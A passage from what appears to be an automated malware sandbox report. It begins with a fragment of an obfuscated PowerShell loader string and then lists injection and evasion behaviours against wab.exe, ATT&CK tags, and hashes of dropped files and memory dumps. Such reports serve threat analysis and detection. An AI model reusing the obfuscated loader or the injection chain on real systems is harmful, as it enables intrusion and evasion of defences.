.egi$KilopSBaglikLumutoTrosfr P etpPaahnePubisd ResteApplisMarty.Ani.as.xcuruGnar,b Texss se,vt,jaktrOutthiReisan.hegegCe la( arad$StagnSAdornwsun,iiFi,zcm M,sksNevusuForumiSpredt cre,dragl$proteDOceani llesftick.fViatoeTrrehrDampbenebulnBestrtTerciiK lopaAvnerlBrystfb drvo V lurColacsF aeltB aavr Len.kBronkeSpirorSuper)Herre ');ratlaasene $Lokalisering;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2756
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $"
      4⤵
      PID:2924
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Loads dropped DLL
      Modifies system executable filetype association
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Program Files directory
      Drops file in Windows directory
      Modifies registry class
      PID:1256

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Privilege Escalation

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\ALLUSE~1\{90140~1\dwtrig20.exe

Filesize
547KB

MD5
fa9e52ffa7ca60c38d490abd96cb3952

SHA1
b8ef0fafe68035128978f0383fab3863301aa62e

SHA256
d416c89d8a396915106fb2462430d90bbe1be05c444098bfc671bb3d12089d96

SHA512
26d959e451ee66a26ead7b7971b3993c3f6882abd912ba5a641215cb90f18bbb7ac94e7ae3008bbf2c1c497e6989b8a607b63967b6dd3aa1ef4a5a953342d1ce

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
14cffe4cb225b35c7e079c0db86939bf

SHA1
bb7ee01ef26171d35d8572ff5dd7a8b6225177d6

SHA256
1d58f6f89eede3e6c5f8c2895d3661b3f075d395ca0f4b54260ad973b959eeae

SHA512
de7afa40d1e5aa9de9bd2d112cb3f5f2952a4e3aeba2d80bb3e91569c69cdced70a555e76a8ddad89cff392e0942bda318c69821e713293ed22b0e9f4e89921b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab585F.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5871.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Acetylmethylcarbinol.Ron

Filesize
402KB

MD5
614c0d722be9595dbbdfdbadfa5eed36

SHA1
6b5b83f8047285a0a95976f45457eb634d3149fb

SHA256
20c30e12f74fc4439417990b3f7531d135ba2333c6023f727f3aa3b3b3b33db8

SHA512
c4422a467a8c0b3c02460f5ec37090b11faa15b4a59684c584fbf76f746adfdded29dbb4474b4635b7b5bcc31aa05c48a087cc77096e0ed870dbee7c9df7ee70

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XS7L9JLAB57D2G3VQHFJ.temp

Filesize
7KB

MD5
457027c2f22a1a06fedcfeeacfd3ec2f

SHA1
7f9a54c56e7a1677a0f43533c2f91d6e35f77fb4

SHA256
5452a6bc11d7c9154494b5b3a5ca9fc34bb4bb30c995f0dd094e7a52361801b3

SHA512
faf41deb2f1fdd18ae8b3cf9368fa72a7a1f203b31b2ad7d344daf184eccfa53d3911351b450e35666d56ea88fd007da995e0dd67cf3511f40f400c844894ee9

Download Submit
\PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE

Filesize
252KB

MD5
9e2b9928c89a9d0da1d3e8f4bd96afa7

SHA1
ec66cda99f44b62470c6930e5afda061579cde35

SHA256
8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

SHA512
2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

Download Submit
memory/1256-84-0x00000000003E0000-0x0000000001442000-memory.dmp

Filesize
16.4MB

Download
memory/1256-170-0x00000000003E0000-0x0000000001442000-memory.dmp

Filesize
16.4MB

Download
memory/1256-168-0x00000000003E0000-0x0000000001442000-memory.dmp

Filesize
16.4MB

Download
memory/1256-167-0x00000000003E0000-0x0000000001442000-memory.dmp

Filesize
16.4MB

Download
memory/2256-57-0x000007FEF565E000-0x000007FEF565F000-memory.dmp

Filesize
4KB

Download
memory/2256-56-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/2256-10-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/2256-6-0x0000000002960000-0x0000000002968000-memory.dmp

Filesize
32KB

Download
memory/2256-7-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/2256-88-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/2256-5-0x000000001B690000-0x000000001B972000-memory.dmp

Filesize
2.9MB

Download
memory/2256-4-0x000007FEF565E000-0x000007FEF565F000-memory.dmp

Filesize
4KB

Download
memory/2256-8-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/2256-9-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/2256-11-0x000007FEF53A0000-0x000007FEF5D3D000-memory.dmp

Filesize
9.6MB

Download
memory/2756-55-0x0000000006670000-0x00000000084CC000-memory.dmp

Filesize
30.4MB

Download